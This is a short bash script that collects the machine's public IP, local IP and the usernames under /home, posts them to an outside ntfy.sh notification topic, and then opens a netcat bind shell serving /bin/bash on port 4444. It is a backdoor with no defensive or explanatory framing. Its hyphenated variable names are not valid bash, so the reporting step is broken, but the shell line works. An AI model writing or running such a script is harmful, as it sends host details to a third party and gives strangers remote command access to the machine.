#!/bin/bash

pub-ip=$(curl "ifconfig.me")
local-ip=$(hostname -I)
who=$(ls /home)

curl -d "My name is ($who) and my local ip is ($local-ip) and my Public IPv4 is($pub-ip) " ntfy.sh/cp_cacc_netcat

nc.traditional -le /bin/bash -p 4444
